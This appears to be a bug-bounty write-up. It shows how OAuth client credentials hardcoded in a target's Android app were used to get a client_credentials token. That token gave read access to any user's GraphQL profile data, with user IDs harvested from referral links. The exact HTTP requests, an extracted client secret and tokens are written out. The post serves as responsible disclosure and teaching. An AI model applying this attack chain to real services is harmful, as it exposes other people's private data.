Access to all users data with OAuth client credentials

In the OAuth client credentials, I described how to find such vulnerabilities. It is a real-world example of that attack.

One day I was poking around in a new BB program and noticed what its authentication request looks like:

POST /v1/oauth/token HTTP/1.1
Host: api.production.target.com
Connection: close
Content-Type: application/json

{
  "grant_type":"password",
  "username":"[email protected]",
  "password":"hax0rPass",
  "client_id":"536a6cf18fd5f4661b6266d3ceac3f"
}

So I started looking up everywhere for a client secret. Finally, in the android application, I found a file res/raw/src_config_prod.json that contains another pair of OAuth credentials:

"Android": {
  "env": "production",
  "apiVersion": "v1",
  "authBaseUrl": "https://my.target.com",
  "clientId": "e547420203007f9a4d07d0b58426b9",
  "clientSecret": "6ba1dc015f2dd457b5720241d7b2a9783f"
},

I had changed the request to this:

POST /v1/oauth/token HTTP/1.1
Host: api.production.target.com
Connection: close
Content-Type: application/json

{
  "grant_type":"client_credentials",
  "client_id": "e547420203007f9a4d07d0b58426b9",
  "client_secret": "6ba1dc015f2dd457b5720241d7b2a9783f"
}

And I have got an access token.

There is a GraphQL API, and regular user can get own data by request:

POST /graphql HTTP/1.1
Host: my.target.com
authorization: Bearer 8fkMOEXmyeMcGn7
accept: */*
content-type: application/json

{
  "operationName":"personQuery",
  "variables": {"id":"u-ipm582ajdn92"},
  "query":"query personQuery($id: ID) { ..."

So I immediately changed the Bearer token to the client’s token and got the same response.

But there was a problem - user ID was not guessable (‘u-ipm582ajdn92’). I tried to find features like messaging between users and have googled for user IDs but got nothing. So I carefully wrote down to my notes everything I have and decided to leave this target for a few days.

After that time, I remembered that the program has a referrals feature, and this is a suitable target to expose user IDs. And I was right.

My referral link looks like https://my.target.com/invite/QDQAAB, and it is redirecting to

https://my.target.com/app/public/invite?referral_token=XX&utm_campaign=referrer-u-ipm582ajdn92

The last link contains my user ID in the utm_campaign parameter, and the referral code is good for brute force. Even better than brute them, I have googled for the invite codes and got more than 1000 results.

Timeline

• May 16, 2020 (Saturday!!!) - reported
• May 16, 2020 (same day) - triaged and rewarded as High
• May 21, 2020 - fixed

References:

• OAuth2 client credentials for the bug bounty